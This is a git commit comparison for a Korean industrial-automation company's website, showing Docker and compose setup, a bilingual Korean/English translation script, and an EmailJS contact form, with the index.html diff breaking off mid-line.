Compare commits
6 Commits
ebd2be03a2
...
a0a212e41c
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
a0a212e41c | ||
|
|
6e9a7ed81b | ||
|
|
63aec54418 | ||
|
|
66e18d23c9 | ||
|
|
998d733eb5 | ||
|
|
7e5f452449 |
2
.gitignore
vendored
Normal file
2
.gitignore
vendored
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
npm/letsencrypt/
|
||||||
|
npm/mysql/
|
||||||
15
Dockerfile
Normal file
15
Dockerfile
Normal file
@@ -0,0 +1,15 @@
|
|||||||
|
FROM python:3.11-slim
|
||||||
|
|
||||||
|
WORKDIR /app
|
||||||
|
|
||||||
|
# 필요한 패키지 설치
|
||||||
|
RUN pip install --no-cache-dir fastapi uvicorn pydantic pydantic[email]
|
||||||
|
|
||||||
|
# 앱 파일 복사
|
||||||
|
COPY mail_contact.py .
|
||||||
|
|
||||||
|
# 포트 8001 노출
|
||||||
|
EXPOSE 8001
|
||||||
|
|
||||||
|
# 앱 실행
|
||||||
|
CMD ["python", "mail_contact.py"]
|
||||||
@@ -1,22 +1,50 @@
|
|||||||
version: '3.8'
|
|
||||||
services:
|
services:
|
||||||
# 1. 관리 도구 (Nginx Proxy Manager)
|
# 1. Nginx Proxy Manager
|
||||||
npm:
|
npm:
|
||||||
image: 'jc21/nginx-proxy-manager:latest'
|
image: 'jc21/nginx-proxy-manager:latest'
|
||||||
container_name: npm-admin
|
container_name: npm-admin
|
||||||
restart: unless-stopped
|
restart: unless-stopped
|
||||||
ports:
|
ports:
|
||||||
- '80:80' # HTTP 외부 접속용
|
- '80:80'
|
||||||
- '81:81' # 관리자 화면 접속용 (HMI 역할)
|
- '81:81'
|
||||||
- '443:443' # HTTPS 보안 접속용
|
- '443:443'
|
||||||
volumes:
|
volumes:
|
||||||
- ./npm/data:/data
|
- ./npm/data:/data
|
||||||
- ./npm/letsencrypt:/etc/letsencrypt
|
- ./npm/letsencrypt:/etc/letsencrypt
|
||||||
|
networks:
|
||||||
|
- default
|
||||||
|
- mailcow-network
|
||||||
|
|
||||||
# 2. 실제 홈페이지 (공사 중 페이지)
|
# 2. 메인 홈페이지
|
||||||
web-server:
|
web-server:
|
||||||
image: nginx:alpine
|
image: nginx:alpine
|
||||||
container_name: hanmo-home
|
container_name: hanmo-home
|
||||||
restart: unless-stopped
|
restart: unless-stopped
|
||||||
|
ports:
|
||||||
|
- '8081:80'
|
||||||
volumes:
|
volumes:
|
||||||
- ./html:/usr/share/nginx/html:ro
|
- ./html:/usr/share/nginx/html:ro
|
||||||
|
- ./nginx.conf:/etc/nginx/conf.d/default.conf:ro
|
||||||
|
networks:
|
||||||
|
- default
|
||||||
|
- mailcow-network
|
||||||
|
|
||||||
|
# 3. 메일 연락처 핸들러
|
||||||
|
mail-contact:
|
||||||
|
build: .
|
||||||
|
container_name: hanmo-mail-contact
|
||||||
|
restart: unless-stopped
|
||||||
|
ports:
|
||||||
|
- '8001:8001'
|
||||||
|
environment:
|
||||||
|
- PYTHONUNBUFFERED=1
|
||||||
|
command: python mail_contact.py
|
||||||
|
networks:
|
||||||
|
- default
|
||||||
|
- mailcow-network
|
||||||
|
|
||||||
|
networks:
|
||||||
|
default:
|
||||||
|
mailcow-network:
|
||||||
|
external: true
|
||||||
|
name: mailcowdockerized_mailcow-network
|
||||||
@@ -37,3 +37,17 @@ body {
|
|||||||
transform: scale(1.1);
|
transform: scale(1.1);
|
||||||
filter: grayscale(0);
|
filter: grayscale(0);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ── 언어 전환 버튼 ───────────────────────────────────────── */
|
||||||
|
.lang-btn {
|
||||||
|
background: transparent;
|
||||||
|
opacity: 0.5;
|
||||||
|
transition: all 0.2s;
|
||||||
|
}
|
||||||
|
.lang-btn:hover {
|
||||||
|
opacity: 0.8;
|
||||||
|
}
|
||||||
|
.lang-btn.active-lang {
|
||||||
|
background: #2563eb;
|
||||||
|
opacity: 1;
|
||||||
|
}
|
||||||
|
|||||||
297
html/assets/js/i18n.js
Normal file
297
html/assets/js/i18n.js
Normal file
@@ -0,0 +1,297 @@
|
|||||||
|
// ============================================================
|
||||||
|
// 다국어 지원 (한국어 / 영어)
|
||||||
|
// ============================================================
|
||||||
|
const translations = {
|
||||||
|
en: {
|
||||||
|
// NAV
|
||||||
|
'nav.home' : 'Home',
|
||||||
|
'nav.dcs' : 'DCS',
|
||||||
|
'nav.batch' : 'Batch Process',
|
||||||
|
'nav.dbsvr' : 'Database Server',
|
||||||
|
'nav.products' : 'Instruments',
|
||||||
|
'nav.services' : 'Services',
|
||||||
|
'nav.about' : 'About',
|
||||||
|
'nav.contact' : 'Contact',
|
||||||
|
'nav.quote' : 'Request Quote',
|
||||||
|
|
||||||
|
// HERO
|
||||||
|
'hero.badge' : 'Precision Industrial Control',
|
||||||
|
'hero.title' : 'Engineering <span class="text-blue-500 font-normal">Precision</span> <br class="hidden md:block"/> Industrial Control',
|
||||||
|
'hero.desc' : 'Hanmo Control & Network Co., Ltd. provides elite-tier DCS and SCADA architectures for critical infrastructure and modern digital transformation.',
|
||||||
|
'hero.btn1' : 'Explore Expertise',
|
||||||
|
'hero.btn2' : 'Consultation',
|
||||||
|
'stat.nodes' : 'Active Nodes',
|
||||||
|
'stat.uptime' : 'System Uptime',
|
||||||
|
'stat.engineers': 'Engineers',
|
||||||
|
'stat.years' : 'Years Excellence',
|
||||||
|
|
||||||
|
// DCS
|
||||||
|
'dcs.badge' : 'Advanced Control Systems',
|
||||||
|
'dcs.title' : 'DCS Integration',
|
||||||
|
'dcs.desc' : 'Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.',
|
||||||
|
'dcs.f1.title' : 'Redundant Architecture',
|
||||||
|
'dcs.f1.desc' : 'Fault-tolerant systems with dual processing units ensuring 99.99% uptime',
|
||||||
|
'dcs.f2.title' : 'Real-time Communication',
|
||||||
|
'dcs.f2.desc' : 'Sub-millisecond response times with synchronized control across multiple nodes',
|
||||||
|
'dcs.f3.title' : 'Security Certified',
|
||||||
|
'dcs.f3.desc' : 'IEC 62443 compliance with military-grade encryption protocols',
|
||||||
|
'dcs.btn' : 'Request Technical Specs',
|
||||||
|
|
||||||
|
// BATCH
|
||||||
|
'batch.badge' : 'Process Automation',
|
||||||
|
'batch.title' : 'Batch Process Control',
|
||||||
|
'batch.desc' : 'Sophisticated batch automation for pharmaceutical, chemical, and specialty manufacturing operations.',
|
||||||
|
'batch.f1.title': 'Recipe Management',
|
||||||
|
'batch.f1.desc' : 'Dynamic recipe engine with version control and audit trail capabilities',
|
||||||
|
'batch.f2.title': 'Performance Analytics',
|
||||||
|
'batch.f2.desc' : 'Real-time batch tracking with predictive quality monitoring',
|
||||||
|
'batch.f3.title': 'GMP Compliant',
|
||||||
|
'batch.f3.desc' : 'FDA 21 CFR Part 11 compliance and complete data integrity',
|
||||||
|
'batch.btn' : 'Start Implementation',
|
||||||
|
|
||||||
|
// DBSVR
|
||||||
|
'db.badge' : 'Data Infrastructure',
|
||||||
|
'db.title' : 'Database Server Solutions',
|
||||||
|
'db.desc' : 'Mission-critical historian and data management infrastructure for continuous industrial operations.',
|
||||||
|
'db.c1.title' : 'High-Performance Historian',
|
||||||
|
'db.c1.desc' : 'SQL Server-based architecture optimized for 1M+ data points per second with sub-second query response',
|
||||||
|
'db.c2.title' : 'Disaster Recovery',
|
||||||
|
'db.c2.desc' : 'Geo-redundant replication with RTO < 15 minutes and RPO < 5 minutes',
|
||||||
|
'db.c3.title' : 'Security & Compliance',
|
||||||
|
'db.c3.desc' : 'Role-based access control, encryption at rest/transit, and full audit logging',
|
||||||
|
'db.btn' : 'Get Infrastructure Consultation',
|
||||||
|
|
||||||
|
// INSTRUMENTS
|
||||||
|
'inst.badge' : 'Precision Measurement',
|
||||||
|
'inst.title' : 'Control Instruments',
|
||||||
|
'inst.desc' : 'Smart field instruments engineered for accuracy and reliability in demanding industrial environments.',
|
||||||
|
'inst.i1.title' : 'Flow Transmitters',
|
||||||
|
'inst.i1.desc' : 'Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy',
|
||||||
|
'inst.i2.title' : 'Pressure Transmitters',
|
||||||
|
'inst.i2.desc' : 'Differential and absolute pressure sensors for ultra-high sensitivity',
|
||||||
|
'inst.i3.title' : 'Temperature Sensors',
|
||||||
|
'inst.i3.desc' : 'RTD, thermocouple, and infrared temperature measurement',
|
||||||
|
'inst.i4.title' : 'Level Transmitters',
|
||||||
|
'inst.i4.desc' : 'Ultrasonic, radar, and capacitive level sensors',
|
||||||
|
'inst.i5.title' : 'Analytical Sensors',
|
||||||
|
'inst.i5.desc' : 'pH, conductivity, oxygen, and dissolved gas analyzers',
|
||||||
|
'inst.i6.title' : 'Control Valves',
|
||||||
|
'inst.i6.desc' : 'Smart positioners with HART communication',
|
||||||
|
'inst.i7.title' : 'Vibration Monitors',
|
||||||
|
'inst.i7.desc' : 'Accelerometers and velocity sensors for predictive maintenance',
|
||||||
|
'inst.i8.title' : 'Smart Data Loggers',
|
||||||
|
'inst.i8.desc' : 'IoT-enabled data acquisition units with cloud connectivity',
|
||||||
|
'inst.custom.title' : 'Custom Integration Available',
|
||||||
|
'inst.custom.desc' : 'All instruments integrate seamlessly with our DCS and SCADA platforms. Custom configurations available for specialized applications.',
|
||||||
|
'inst.custom.btn' : 'Request Custom Configuration',
|
||||||
|
'inst.quote' : 'Get Quote →',
|
||||||
|
|
||||||
|
// SERVICES
|
||||||
|
'svc.badge' : 'Our Capabilities',
|
||||||
|
'svc.title' : 'World-Class Automation',
|
||||||
|
'svc.desc' : 'Specialized engineering for complex physical operations through advanced data integration and distributed control systems.',
|
||||||
|
'svc.s1.title' : 'DCS Integration',
|
||||||
|
'svc.s1.desc' : 'Redundant control architectures for utility-scale industries including power and chemical plants.',
|
||||||
|
'svc.s1.link' : 'Learn More',
|
||||||
|
'svc.s2.title' : 'SCADA Design',
|
||||||
|
'svc.s2.desc' : 'Real-time monitoring platforms with advanced HMI and secure remote access protocols.',
|
||||||
|
'svc.s2.link' : 'Case Studies',
|
||||||
|
'svc.s3.title' : 'Data Historians',
|
||||||
|
'svc.s3.desc' : 'Mission-critical SQL infrastructure optimized for massive industrial time-series data storage.',
|
||||||
|
'svc.s3.link' : 'Data Security',
|
||||||
|
'svc.s4.title' : 'Control Instruments',
|
||||||
|
'svc.s4.desc' : 'Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.',
|
||||||
|
'svc.s4.link' : 'Product Catalog',
|
||||||
|
|
||||||
|
// ABOUT
|
||||||
|
'about.badge' : 'About Hanmo',
|
||||||
|
'about.title' : 'Trusted Partner in Industrial Automation',
|
||||||
|
'about.p1' : 'Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering. We specialize in designing, implementing, and maintaining mission-critical control systems for the world\'s most demanding industries.',
|
||||||
|
'about.p2' : 'Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking, ensuring your operations run with unmatched precision and reliability.',
|
||||||
|
'about.cert' : 'Certified',
|
||||||
|
'about.support' : 'Support',
|
||||||
|
'about.years' : 'Years of Industrial Excellence',
|
||||||
|
|
||||||
|
// CONTACT
|
||||||
|
'contact.badge' : 'Get In Touch',
|
||||||
|
'contact.title' : 'Start Your Project',
|
||||||
|
'contact.desc' : 'Contact our engineering team for a detailed consultation and project assessment.',
|
||||||
|
'contact.name' : 'Full Name',
|
||||||
|
'contact.email' : 'Email Address',
|
||||||
|
'contact.company': 'Company Name',
|
||||||
|
'contact.msg' : 'Describe your project requirements...',
|
||||||
|
'contact.btn' : 'Send Message',
|
||||||
|
'contact.sending': 'Sending...',
|
||||||
|
'contact.success': '✅ Message sent successfully. We will get back to you shortly.',
|
||||||
|
'contact.error.required': '⚠ Name, email, and message are required.',
|
||||||
|
'contact.error.email' : '⚠ Please enter a valid email address.',
|
||||||
|
'contact.error.fail' : '❌ Failed to send. Please try again later.',
|
||||||
|
|
||||||
|
// FOOTER
|
||||||
|
'footer.copy' : '© 2024 Hanmo Control & Network Co., Ltd. All rights reserved.',
|
||||||
|
},
|
||||||
|
|
||||||
|
ko: {
|
||||||
|
// NAV
|
||||||
|
'nav.home' : '홈',
|
||||||
|
'nav.dcs' : 'DCS',
|
||||||
|
'nav.batch' : '배치 프로세스',
|
||||||
|
'nav.dbsvr' : '데이터베이스 서버',
|
||||||
|
'nav.products' : '계측기기',
|
||||||
|
'nav.services' : '서비스',
|
||||||
|
'nav.about' : '회사소개',
|
||||||
|
'nav.contact' : '문의하기',
|
||||||
|
'nav.quote' : '견적 요청',
|
||||||
|
|
||||||
|
// HERO
|
||||||
|
'hero.badge' : '정밀 공정 제어 시스템',
|
||||||
|
'hero.title' : '<span class="text-blue-500 font-normal">정밀함</span>을 설계하는<br class="hidden md:block"/> 공정 제어 전문기업',
|
||||||
|
'hero.desc' : '(주)한모씨앤앤은 핵심 인프라와 디지털 전환을 위한 최고 수준의 DCS 및 SCADA BATCH CONTROL 시스템을 제공합니다.',
|
||||||
|
'hero.btn1' : '전문 분야 보기',
|
||||||
|
'hero.btn2' : '상담 신청',
|
||||||
|
'stat.nodes' : '운영 노드',
|
||||||
|
'stat.uptime' : '시스템 가동률',
|
||||||
|
'stat.engineers': '전문 엔지니어',
|
||||||
|
'stat.years' : '년 업계 경력',
|
||||||
|
|
||||||
|
// DCS
|
||||||
|
'dcs.badge' : '고급 제어 시스템',
|
||||||
|
'dcs.title' : 'DCS 통합 솔루션',
|
||||||
|
'dcs.desc' : '가장 중요한 공정 현장을 위한 엔터프라이즈급 분산 제어 시스템(DCS) 아키텍처를 설계합니다.',
|
||||||
|
'dcs.f1.title' : '이중화 아키텍처',
|
||||||
|
'dcs.f1.desc' : '듀얼 처리 장치로 99.99% 가동률을 보장하는 내결함성 시스템',
|
||||||
|
'dcs.f2.title' : '실시간 통신',
|
||||||
|
'dcs.f2.desc' : '밀리초 미만의 응답 시간으로 다중 노드 간 동기화된 제어 실현',
|
||||||
|
'dcs.f3.title' : '보안 인증',
|
||||||
|
'dcs.f3.desc' : 'IEC 62443 준수 및 군사 수준 암호화 프로토콜 적용',
|
||||||
|
'dcs.btn' : '기술 사양 요청',
|
||||||
|
|
||||||
|
// BATCH
|
||||||
|
'batch.badge' : '프로세스 자동화',
|
||||||
|
'batch.title' : '배치 프로세스 제어',
|
||||||
|
'batch.desc' : '제약, 화학 및 특수 제조 공정을 위한 정교한 배치 자동화 시스템을 구축합니다.',
|
||||||
|
'batch.f1.title': '레시피 관리',
|
||||||
|
'batch.f1.desc' : '버전 관리 및 감사 추적 기능을 갖춘 동적 레시피 엔진',
|
||||||
|
'batch.f2.title': '성능 분석',
|
||||||
|
'batch.f2.desc' : '예측 품질 모니터링을 통한 실시간 배치 추적',
|
||||||
|
'batch.f3.title': 'GMP 준수',
|
||||||
|
'batch.f3.desc' : 'FDA 21 CFR Part 11 준수 및 완전한 데이터 무결성 보장',
|
||||||
|
'batch.btn' : '구축 상담 신청',
|
||||||
|
|
||||||
|
// DBSVR
|
||||||
|
'db.badge' : '데이터 인프라',
|
||||||
|
'db.title' : '데이터베이스 서버 솔루션',
|
||||||
|
'db.desc' : '지속적인 공정 운영을 위한 미션 크리티컬 히스토리안 및 데이터 관리 인프라를 제공합니다.',
|
||||||
|
'db.c1.title' : '고성능 히스토리안',
|
||||||
|
'db.c1.desc' : '초당 100만+ 데이터 포인트를 처리하는 SQL Server 기반 아키텍처',
|
||||||
|
'db.c2.title' : '재해 복구',
|
||||||
|
'db.c2.desc' : 'RTO 15분 미만, RPO 5분 미만의 지역 이중화 복제 시스템',
|
||||||
|
'db.c3.title' : '보안 및 컴플라이언스',
|
||||||
|
'db.c3.desc' : '역할 기반 접근 제어, 저장/전송 암호화 및 완전한 감사 로깅',
|
||||||
|
'db.btn' : '인프라 상담 신청',
|
||||||
|
|
||||||
|
// INSTRUMENTS
|
||||||
|
'inst.badge' : '정밀 계측',
|
||||||
|
'inst.title' : '계측 제어 기기',
|
||||||
|
'inst.desc' : '가혹한 공정 환경에서도 정확성과 신뢰성을 발휘하는 스마트 현장 계측기기를 공급합니다.',
|
||||||
|
'inst.i1.title' : '유량 변환기',
|
||||||
|
'inst.i1.desc' : '±0.5% 정확도의 전자식, 코리올리스, 와류식 유량계',
|
||||||
|
'inst.i2.title' : '압력 변환기',
|
||||||
|
'inst.i2.desc' : '초고감도 차압 및 절대압력 센서',
|
||||||
|
'inst.i3.title' : '온도 센서',
|
||||||
|
'inst.i3.desc' : 'RTD, 열전대, 적외선 온도 측정기',
|
||||||
|
'inst.i4.title' : '레벨 트랜스미터',
|
||||||
|
'inst.i4.desc' : '초음파, 레이더, 정전용량식 레벨 센서',
|
||||||
|
'inst.i5.title' : '분석 센서',
|
||||||
|
'inst.i5.desc' : 'pH, 전도도, 산소, 용존 가스 분석기',
|
||||||
|
'inst.i6.title' : '컨트롤 밸브',
|
||||||
|
'inst.i6.desc' : 'HART 통신 지원 스마트 포지셔너',
|
||||||
|
'inst.i7.title' : '진동 모니터',
|
||||||
|
'inst.i7.desc' : '예측 유지보수를 위한 가속도계 및 속도 센서',
|
||||||
|
'inst.i8.title' : '스마트 데이터 로거',
|
||||||
|
'inst.i8.desc' : '클라우드 연결 기능을 갖춘 IoT 데이터 수집 장치',
|
||||||
|
'inst.custom.title' : '맞춤형 통합 솔루션 제공',
|
||||||
|
'inst.custom.desc' : '모든 계측기기는 당사의 DCS 및 SCADA 플랫폼과 원활하게 통합됩니다. 특수 응용 분야에 맞는 커스텀 구성이 가능합니다.',
|
||||||
|
'inst.custom.btn' : '맞춤 구성 요청',
|
||||||
|
'inst.quote' : '견적 요청 →',
|
||||||
|
|
||||||
|
// SERVICES
|
||||||
|
'svc.badge' : '서비스 역량',
|
||||||
|
'svc.title' : '세계 최고 수준의 자동화',
|
||||||
|
'svc.desc' : '고급 데이터 통합 및 분산 제어 시스템을 통해 복잡한 공정 공정을 위한 특화된 엔지니어링을 제공합니다.',
|
||||||
|
'svc.s1.title' : 'DCS 통합',
|
||||||
|
'svc.s1.desc' : '발전소, 화학 플랜트 등 대규모 공정을 위한 이중화 제어 아키텍처',
|
||||||
|
'svc.s1.link' : '자세히 보기',
|
||||||
|
'svc.s2.title' : 'SCADA 설계',
|
||||||
|
'svc.s2.desc' : '고급 HMI 및 보안 원격 접속 프로토콜을 갖춘 실시간 모니터링 플랫폼',
|
||||||
|
'svc.s2.link' : '사례 연구',
|
||||||
|
'svc.s3.title' : '데이터 히스토리안',
|
||||||
|
'svc.s3.desc' : '대규모 공정 시계열 데이터 저장에 최적화된 미션 크리티컬 SQL 인프라',
|
||||||
|
'svc.s3.link' : '데이터 보안',
|
||||||
|
'svc.s4.title' : '제어 계측기기',
|
||||||
|
'svc.s4.desc' : '고정밀 교정을 통한 유량, 압력, 온도 스마트 현장 센서',
|
||||||
|
'svc.s4.link' : '제품 카탈로그',
|
||||||
|
|
||||||
|
// ABOUT
|
||||||
|
'about.badge' : '회사 소개',
|
||||||
|
'about.title' : '공정 자동화의 신뢰할 수 있는 파트너',
|
||||||
|
'about.p1' : '(주)한모씨앤앤는 창립 이래 공정 자동화 엔지니어링의 최전선에서 활동하고 있습니다. 세계에서 가장 까다로운 공정 현장을 위한 미션 크리티컬 제어 시스템 설계, 구현 및 유지보수를 전문으로 합니다.',
|
||||||
|
'about.p2' : '60여 명의 공인 엔지니어로 구성된 팀이 DCS, SCADA, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.',
|
||||||
|
'about.cert' : '인증',
|
||||||
|
'about.support' : '지원',
|
||||||
|
'about.years' : '년 공정 분야 우수성',
|
||||||
|
|
||||||
|
// CONTACT
|
||||||
|
'contact.badge' : '문의하기',
|
||||||
|
'contact.title' : '프로젝트를 시작하세요',
|
||||||
|
'contact.desc' : '엔지니어링 팀에 문의하여 상세 상담 및 프로젝트 평가를 받아보세요.',
|
||||||
|
'contact.name' : '성명',
|
||||||
|
'contact.email' : '이메일 주소',
|
||||||
|
'contact.company': '회사명',
|
||||||
|
'contact.msg' : '프로젝트 요구사항을 설명해 주세요...',
|
||||||
|
'contact.btn' : '메시지 보내기',
|
||||||
|
'contact.sending': '전송 중...',
|
||||||
|
'contact.success': '✅ 메시지가 성공적으로 전송되었습니다. 빠른 시일 내에 회신 드리겠습니다.',
|
||||||
|
'contact.error.required': '⚠ 이름, 이메일, 메시지는 필수 항목입니다.',
|
||||||
|
'contact.error.email' : '⚠ 올바른 이메일 주소를 입력해 주세요.',
|
||||||
|
'contact.error.fail' : '❌ 전송에 실패했습니다. 잠시 후 다시 시도해 주세요.',
|
||||||
|
|
||||||
|
// FOOTER
|
||||||
|
'footer.copy' : '© 2024 (주)한모씨앤앤. All rights reserved.',
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
// ── 현재 언어 (로컬스토리지 유지) ──────────────────────────
|
||||||
|
let currentLang = localStorage.getItem('hmLang') || 'en';
|
||||||
|
|
||||||
|
function t(key) {
|
||||||
|
return translations[currentLang][key] || translations['en'][key] || key;
|
||||||
|
}
|
||||||
|
|
||||||
|
function applyTranslations() {
|
||||||
|
document.querySelectorAll('[data-i18n]').forEach(el => {
|
||||||
|
const key = el.getAttribute('data-i18n');
|
||||||
|
const type = el.getAttribute('data-i18n-type') || 'text';
|
||||||
|
if (type === 'html') {
|
||||||
|
el.innerHTML = t(key);
|
||||||
|
} else if (type === 'placeholder') {
|
||||||
|
el.setAttribute('placeholder', t(key));
|
||||||
|
} else {
|
||||||
|
el.textContent = t(key);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
// <html lang> 업데이트
|
||||||
|
document.documentElement.lang = currentLang;
|
||||||
|
// 버튼 활성 상태 업데이트
|
||||||
|
document.querySelectorAll('.lang-btn').forEach(btn => {
|
||||||
|
btn.classList.toggle('active-lang', btn.dataset.lang === currentLang);
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
function switchLang(lang) {
|
||||||
|
currentLang = lang;
|
||||||
|
localStorage.setItem('hmLang', lang);
|
||||||
|
applyTranslations();
|
||||||
|
}
|
||||||
|
|
||||||
|
document.addEventListener('DOMContentLoaded', applyTranslations);
|
||||||
@@ -1,48 +1,89 @@
|
|||||||
// Header scroll effect
|
// ============================================================
|
||||||
|
// ★ EmailJS 설정 - 아래 3가지 값을 본인 계정으로 교체하세요 ★
|
||||||
|
// ============================================================
|
||||||
|
const EMAILJS_PUBLIC_KEY = 'HO6i369gX6X5HEXtJ';
|
||||||
|
const EMAILJS_SERVICE_ID = 'service_4ur5lqd';
|
||||||
|
const EMAILJS_TEMPLATE_ID = 'template_jp0v5qv';
|
||||||
|
// ============================================================
|
||||||
|
|
||||||
|
emailjs.init(EMAILJS_PUBLIC_KEY);
|
||||||
|
|
||||||
|
// ── Contact Form ─────────────────────────────────────────────
|
||||||
|
document.getElementById('contact-submit').addEventListener('click', function () {
|
||||||
|
const name = document.getElementById('contact-name').value.trim();
|
||||||
|
const email = document.getElementById('contact-email').value.trim();
|
||||||
|
const company = document.getElementById('contact-company').value.trim();
|
||||||
|
const message = document.getElementById('contact-message').value.trim();
|
||||||
|
const btn = document.getElementById('contact-submit');
|
||||||
|
|
||||||
|
if (!name || !email || !message) {
|
||||||
|
showStatus('error', t('contact.error.required')); return;
|
||||||
|
}
|
||||||
|
if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
|
||||||
|
showStatus('error', t('contact.error.email')); return;
|
||||||
|
}
|
||||||
|
|
||||||
|
btn.disabled = true;
|
||||||
|
btn.textContent = t('contact.sending');
|
||||||
|
|
||||||
|
const templateParams = {
|
||||||
|
name : name,
|
||||||
|
message : 'Email : ' + email + '\nCompany : ' + (company || 'N/A') + '\n\n' + message,
|
||||||
|
reply_to : email
|
||||||
|
};
|
||||||
|
|
||||||
|
emailjs.send(EMAILJS_SERVICE_ID, EMAILJS_TEMPLATE_ID, templateParams)
|
||||||
|
.then(function () {
|
||||||
|
showStatus('success', t('contact.success'));
|
||||||
|
document.getElementById('contact-name').value = '';
|
||||||
|
document.getElementById('contact-email').value = '';
|
||||||
|
document.getElementById('contact-company').value = '';
|
||||||
|
document.getElementById('contact-message').value = '';
|
||||||
|
})
|
||||||
|
.catch(function (error) {
|
||||||
|
console.error('EmailJS error:', error);
|
||||||
|
showStatus('error', t('contact.error.fail'));
|
||||||
|
})
|
||||||
|
.finally(function () {
|
||||||
|
btn.disabled = false;
|
||||||
|
btn.textContent = t('contact.btn');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
function showStatus(type, msg) {
|
||||||
|
const status = document.getElementById('contact-status');
|
||||||
|
status.classList.remove('hidden', 'bg-green-500/20', 'text-green-400', 'bg-red-500/20', 'text-red-400');
|
||||||
|
status.classList.add(type === 'success' ? 'bg-green-500/20' : 'bg-red-500/20',
|
||||||
|
type === 'success' ? 'text-green-400' : 'text-red-400');
|
||||||
|
status.textContent = msg;
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Header scroll ────────────────────────────────────────────
|
||||||
const mainHeader = document.getElementById('main-header');
|
const mainHeader = document.getElementById('main-header');
|
||||||
const brandName = document.getElementById('brand-name');
|
const brandName = document.getElementById('brand-name');
|
||||||
const navLinks = document.querySelectorAll('.nav-link');
|
const navLinks = document.querySelectorAll('.nav-link');
|
||||||
|
|
||||||
window.addEventListener('scroll', () => {
|
window.addEventListener('scroll', () => {
|
||||||
if (window.scrollY > 50) {
|
if (window.scrollY > 50) {
|
||||||
mainHeader.classList.add('glass-effect', 'py-3');
|
mainHeader.classList.add('glass-effect', 'py-3');
|
||||||
mainHeader.classList.remove('py-6');
|
mainHeader.classList.remove('py-6');
|
||||||
if (brandName) brandName.classList.replace('text-white', 'text-slate-900');
|
if (brandName) brandName.classList.replace('text-white', 'text-slate-900');
|
||||||
navLinks.forEach(link => {
|
navLinks.forEach(link => link.classList.replace('text-slate-100', 'text-slate-700'));
|
||||||
link.classList.replace('text-slate-100', 'text-slate-700');
|
|
||||||
});
|
|
||||||
} else {
|
} else {
|
||||||
mainHeader.classList.remove('glass-effect', 'py-3');
|
mainHeader.classList.remove('glass-effect', 'py-3');
|
||||||
mainHeader.classList.add('py-6');
|
mainHeader.classList.add('py-6');
|
||||||
if (brandName) brandName.classList.replace('text-slate-900', 'text-white');
|
if (brandName) brandName.classList.replace('text-slate-900', 'text-white');
|
||||||
navLinks.forEach(link => {
|
navLinks.forEach(link => link.classList.replace('text-slate-700', 'text-slate-100'));
|
||||||
link.classList.replace('text-slate-700', 'text-slate-100');
|
|
||||||
});
|
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
|
|
||||||
// Mobile menu open
|
// ── Mobile menu ───────────────────────────────────────────────
|
||||||
const mobileMenuBtn = document.getElementById('mobile-menu-btn');
|
const mobileMenuBtn = document.getElementById('mobile-menu-btn');
|
||||||
const mobileMenu = document.getElementById('mobile-menu');
|
const mobileMenu = document.getElementById('mobile-menu');
|
||||||
const closeMenuBtn = document.getElementById('close-menu-btn');
|
const closeMenuBtn = document.getElementById('close-menu-btn');
|
||||||
|
|
||||||
if (mobileMenuBtn) {
|
if (mobileMenuBtn) mobileMenuBtn.addEventListener('click', () => mobileMenu.classList.remove('translate-x-full'));
|
||||||
mobileMenuBtn.addEventListener('click', () => {
|
if (closeMenuBtn) closeMenuBtn.addEventListener('click', () => mobileMenu.classList.add('translate-x-full'));
|
||||||
mobileMenu.classList.remove('translate-x-full');
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
// Mobile menu close
|
|
||||||
if (closeMenuBtn) {
|
|
||||||
closeMenuBtn.addEventListener('click', () => {
|
|
||||||
mobileMenu.classList.add('translate-x-full');
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
// Close on nav link click
|
|
||||||
const mobileNavLinks = mobileMenu ? mobileMenu.querySelectorAll('a') : [];
|
const mobileNavLinks = mobileMenu ? mobileMenu.querySelectorAll('a') : [];
|
||||||
mobileNavLinks.forEach(link => {
|
mobileNavLinks.forEach(link => link.addEventListener('click', () => mobileMenu.classList.add('translate-x-full')));
|
||||||
link.addEventListener('click', () => {
|
|
||||||
mobileMenu.classList.add('translate-x-full');
|
|
||||||
});
|
|
||||||
});
|
|
||||||
|
|||||||
398
html/index.html
398
html/index.html
@@ -19,30 +19,29 @@
|
|||||||
<span class="text-white font-bold text-xl font-industrial">H</span>
|
<span class="text-white font-bold text-xl font-industrial">H</span>
|
||||||
</div>
|
</div>
|
||||||
<div class="flex flex-col leading-none">
|
<div class="flex flex-col leading-none">
|
||||||
<span id="brand-name" class="font-bold text-xl tracking-tight font-industrial text-white transition-colors duration-300">
|
<span id="brand-name" class="font-bold text-xl tracking-tight font-industrial text-white transition-colors duration-300">HANMO</span>
|
||||||
HANMO
|
<span id="brand-sub" class="text-[9px] font-bold uppercase tracking-[0.2em] mt-1 text-blue-500">Control & Network</span>
|
||||||
</span>
|
|
||||||
<span id="brand-sub" class="text-[9px] font-bold uppercase tracking-[0.2em] mt-1 text-blue-500">
|
|
||||||
Control & Network
|
|
||||||
</span>
|
|
||||||
</div>
|
</div>
|
||||||
</a>
|
</a>
|
||||||
|
|
||||||
<nav class="hidden md:flex gap-10">
|
<nav class="hidden md:flex gap-10">
|
||||||
<a href="#home" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">Home</a>
|
<a href="#home" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.home">Home</a>
|
||||||
<a href="#dcs" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">DCS</a>
|
